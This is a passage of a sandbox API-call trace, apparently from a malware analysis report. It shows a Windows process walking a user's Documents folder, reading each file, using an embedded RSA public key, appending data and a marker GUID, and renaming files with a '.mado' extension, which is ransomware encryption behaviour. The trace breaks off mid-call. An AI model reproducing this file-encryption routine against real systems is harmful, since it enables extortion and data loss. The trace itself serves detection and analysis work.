0x3b74e80 [0205.129] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="8TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1", cchWideChar=-1, lpMultiByteStr=0x3b74e80, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="8TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1", lpUsedDefaultChar=0x0) returned 41 [0205.129] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x430) returned 0x3b752b0 [0205.129] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74e80 | out: hHeap=0x2c0000) returned 1 [0205.129] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3846b8 | out: hHeap=0x2c0000) returned 1 [0205.130] WriteFile (in: hFile=0x63c, lpBuffer=0x3b752b0*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b752b0*, lpNumberOfBytesWritten=0x39cfb50*=0x28, lpOverlapped=0x0) returned 1 [0205.130] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b752b0 | out: hHeap=0x2c0000) returned 1 [0205.130] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0205.130] WriteFile (in: hFile=0x63c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39cfb50*=0x26, lpOverlapped=0x0) returned 1 [0205.130] CloseHandle (hObject=0x63c) returned 1 [0205.131] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb0) returned 0x3b66078 [0205.131] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8b0) returned 0x3b74e80 [0205.131] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b66078 | out: hHeap=0x2c0000) returned 1 [0205.131] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\fZpil8Uu6QzTlWoWB\\BlHpbVqh74ps7nRmbd.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fzpil8uu6qztlwowb\\blhpbvqh74ps7nrmbd.pptx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\fZpil8Uu6QzTlWoWB\\BlHpbVqh74ps7nRmbd.pptx.mado" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fzpil8uu6qztlwowb\\blhpbvqh74ps7nrmbd.pptx.mado")) returned 1 [0205.132] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74e80 | out: hHeap=0x2c0000) returned 1 [0205.132] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0205.132] VirtualFree (lpAddress=0x3d10000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0205.133] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32d6360 | out: hHeap=0x2c0000) returned 1 [0205.133] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd39b2240, ftCreationTime.dwHighDateTime=0x1d5d978, ftLastAccessTime.dwLowDateTime=0xc572fc40, ftLastAccessTime.dwHighDateTime=0x1d5e0b4, ftLastWriteTime.dwLowDateTime=0xc572fc40, ftLastWriteTime.dwHighDateTime=0x1d5e0b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="F RRWNCvdbx", cAlternateFileName="FRRWNC~1")) returned 1 [0205.133] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ef090 [0205.133] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2eeff8 [0205.133] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67168 [0205.133] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67258 [0205.133] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321c00 [0205.133] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67690 [0205.133] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf24d6280, ftCreationTime.dwHighDateTime=0x1d5dd69, ftLastAccessTime.dwLowDateTime=0x518cfaa0, ftLastAccessTime.dwHighDateTime=0x1d5dc91, ftLastWriteTime.dwLowDateTime=0x518cfaa0, ftLastWriteTime.dwHighDateTime=0x1d5dc91, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="iZ56A9bRq3KDvJgS8nb", cAlternateFileName="IZ56A9~1")) returned 1 [0205.133] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x3b6bb80 [0205.133] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x3b6bc28 [0205.134] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa8) returned 0x3b2fd8 [0205.134] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67078 [0205.134] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321b78 [0205.134] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b670f0 [0205.134] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ef090 [0205.134] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc960b10, ftCreationTime.dwHighDateTime=0x1d5d9dc, ftLastAccessTime.dwLowDateTime=0xdd54d900, ftLastAccessTime.dwHighDateTime=0x1d5e4b0, ftLastWriteTime.dwLowDateTime=0xdd54d900, ftLastWriteTime.dwHighDateTime=0x1d5e4b0, nFileSizeHigh=0x0, nFileSizeLow=0x8e25, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="x3NdKot6 fqk.odp", cAlternateFileName="X3NDKO~1.ODP")) returned 1 [0205.134] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321c00 [0205.134] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xbe) returned 0x32d6360 [0205.134] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\fZpil8Uu6QzTlWoWB\\x3NdKot6 fqk.odp") returned=".odp" [0205.134] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\fZpil8Uu6QzTlWoWB\\x3NdKot6 fqk.odp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fzpil8uu6qztlwowb\\x3ndkot6 fqk.odp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x63c [0205.135] GetFileSizeEx (in: hFile=0x63c, lpFileSize=0x39cfb40 | out: lpFileSize=0x39cfb40*=36389) returned 1 [0205.135] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3d10000 [0205.137] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x8dff, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0205.137] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39cfb78, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb78*=0x26, lpOverlapped=0x0) returned 1 [0205.139] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c01e0 [0205.139] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39cfb70, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb70*=0x8e25, lpOverlapped=0x0) returned 1 [0205.139] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0205.139] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1da) returned 0x3310808 [0205.139] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0205.140] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0205.140] CryptAcquireContextW (in: phProv=0x39cfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39cfa50*=0x321c00) returned 1 [0205.140] CryptCreateHash (in: hProv=0x321c00, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39cfa58 | out: phHash=0x39cfa58) returned 1 [0205.140] CryptHashData (hHash=0x32ef238, pbData=0x3310808, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0205.140] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x0, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39cfa54) returned 1 [0205.140] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x32b3720 [0205.140] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x32b3720, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x32b3720, pdwDataLen=0x39cfa54) returned 1 [0205.141] GetLastError () returned 0x0 [0205.141] CryptDestroyHash (hHash=0x32ef238) returned 1 [0205.141] CryptReleaseContext (hProv=0x321c00, dwFlags=0x0) returned 1 [0205.141] UuidCreate (in: Uuid=0x39cfa48 | out: Uuid=0x39cfa48) returned 0x0 [0205.141] UuidToStringA (in: Uuid=0x39cfa48, StringUuid=0x39cfa40 | out: StringUuid=0x39cfa40) returned 0x0 [0205.141] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0170 [0205.141] RpcStringFreeA (in: String=0x39cfa40 | out: String=0x39cfa40) returned 0x0 [0205.141] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x3b75968, Size=0x218) returned 0x3b7c6a8 [0205.141] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x3b74e80 [0205.141] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x8e25, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0205.141] WriteFile (in: hFile=0x63c, lpBuffer=0x3b72b80*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b72b80*, lpNumberOfBytesWritten=0x39cfb50*=0x100, lpOverlapped=0x0) returned 1 [0205.142] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0205.142] WriteFile (in: hFile=0x63c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39cfb50*=0x26, lpOverlapped=0x0) returned 1 [0205.142] CloseHandle (hObject=0x63c) returned 1 [0205.143] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x3b6bb80 [0205.143] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8a0) returned 0x3b74e80 [0205.143] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\fZpil8Uu6QzTlWoWB\\x3NdKot6 fqk.odp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fzpil8uu6qztlwowb\\x3ndkot6 fqk.odp"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\fZpil8Uu6QzTlWoWB\\x3NdKot6 fqk.odp.mado" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fzpil8uu6qztlwowb\\x3ndkot6 fqk.odp.mado")) returned 1 [0205.144] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb5d033b0, ftCreationTime.dwHighDateTime=0x1d5e4fc, ftLastAccessTime.dwLowDateTime=0x430f5ea0, ftLastAccessTime.dwHighDateTime=0x1d5da2a, ftLastWriteTime.dwLowDateTime=0x430f5ea0, ftLastWriteTime.dwHighDateTime=0x1d5da2a, nFileSizeHigh=0x0, nFileSizeLow=0x821f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="YnWruvpsOj2zx9x8a.csv", cAlternateFileName="YNWRUV~1.CSV")) returned 1 [0205.144] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321c00 [0205.145] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xbe) returned 0x32d6360 [0205.145] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\fZpil8Uu6QzTlWoWB\\YnWruvpsOj2zx9x8a.csv") returned=".csv" [0205.145] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\fZpil8Uu6QzTlWoWB\\YnWruvpsOj2zx9x8a.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fzpil8uu6qztlwowb\\ynwruvpsoj2zx9x8a.csv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x63c [0205.145] GetFileSizeEx (in: hFile=0x63c, lpFileSize=0x39cfb40 | out: lpFileSize=0x39cfb40*=33311) returned 1 [0205.145] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3d10000 [0205.147] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x81f9, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0205.147] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39cfb78, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb78*=0x26, lpOverlapped=0x0) returned 1 [0205.149] SetFilePointer (in: hFile=0x63c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0205.149] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39cfb70, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb70*=0x821f, lpOverlapped=0x0) returned 1 [0205.149] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0205.149] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1da) returned 0x3310808 [0205.149] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0205.149] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0205.149] CryptAcquireContextW (in: phProv=0x39cfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39cfa50*=0x321c00) returned 1 [0205.150] CryptCreateHash (in: hProv=0x321c00, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39cfa58 | out: phHash=0x39cfa58) returned 1 [0205.150] CryptHashData (hHash=0x32ef238, pbData=0x3310808, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0205.150] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x0, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39cfa54) returned 1 [0205.150] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x32b3720 [0205.150] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x32b3720, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x32b3720, pdwDataLen=0x39cfa54) returned 1 [0205.151] GetLastError () returned 0x0 [0205.151] CryptDestroyHash (hHash=0x32ef238) returned 1 [0205.151] CryptReleaseContext (hProv=0x321c00, dwFlags=0x0) returned 1 [0205.151] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3310808 | out: hHeap=0x2c0000) returned 1 [0205.151] UuidCreate (in: Uuid=0x39cfa48 | out: Uuid=0x39cfa48) returned 0x0 [0205.151] UuidToStringA (in: Uuid=0x39cfa48, StringUuid=0x39cfa40 | out: StringUuid=0x39cfa40) returned 0x0 [0205.151] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0170 [0205.151] RpcStringFreeA (in: String=0x39cfa40 | out: String=0x39cfa40) returned 0x0 [0205.151] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0205.151] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c01e0 [0205.151] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8220) returned 0x3b81690 [0205.151] SetFilePointer (in: hFile=0x63c, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0205.151] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0170 | out: hHeap=0x2c0000) returned 1 [0205.151] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1e0) returned 0x3310808 [0205.151] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0170 [0205.151] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1e0) returned 0x32eb20 [0205.151] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x32e5258 [0205.151] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3b81398 [0205.151] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe688 [0205.151] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3b813e0 [0205.151] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe6a0 [0205.151] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe6d0 [0205.151] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe718 [0205.151] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe6e8 [0205.151] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x32f7e58 [0205.152] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x3b75968 [0205.152] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x3b75968, Size=0x218) returned 0x3b7c6a8 [0205.152] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x3b74e80 [0205.152] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe6d0 | out: hHeap=0x2c0000) returned 1 [0205.152] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe6e8 | out: hHeap=0x2c0000) returned 1 [0205.152] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe718 | out: hHeap=0x2c0000) returned 1 [0205.152] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f7e58 | out: hHeap=0x2c0000) returned 1 [0205.152] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74e80 | out: hHeap=0x2c0000) returned 1 [0205.152] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe718 [0205.152] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x32771a8 [0205.152] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x32fe6e8 [0205.152] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x32b36e0 [0205.152] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x32fe6d0 [0205.152] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x3277188 [0205.152] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x3b6eec8 [0205.152] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9250 [0205.152] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x32e51f8 [0205.152] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b3720 [0205.152] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x3b6eb80 [0205.152] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36c0 [0205.152] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277198 [0205.152] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6eec8 | out: hHeap=0x2c0000) returned 1 [0205.152] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe6e8 | out: hHeap=0x2c0000) returned 1 [0205.152] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277188 | out: hHeap=0x2c0000) returned 1 [0205.152] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe6d0 | out: hHeap=0x2c0000) returned 1 [0205.152] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36e0 | out: hHeap=0x2c0000) returned 1 [0205.152] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771a8 | out: hHeap=0x2c0000) returned 1 [0205.152] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe718 | out: hHeap=0x2c0000) returned 1 [0205.152] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9250 | out: hHeap=0x2c0000) returned 1 [0205.153] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32e5258 | out: hHeap=0x2c0000) returned 1 [0205.153] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7c6a8 | out: hHeap=0x2c0000) returned 1 [0205.153] GetCurrentThreadId () returned 0x600 [0205.153] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b72b80 [0205.153] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x3b68858 [0205.153] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x32c0218 [0205.153] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321c00 [0205.153] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x336fe98 [0205.153] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771a8 [0205.153] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277188 [0205.153] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, 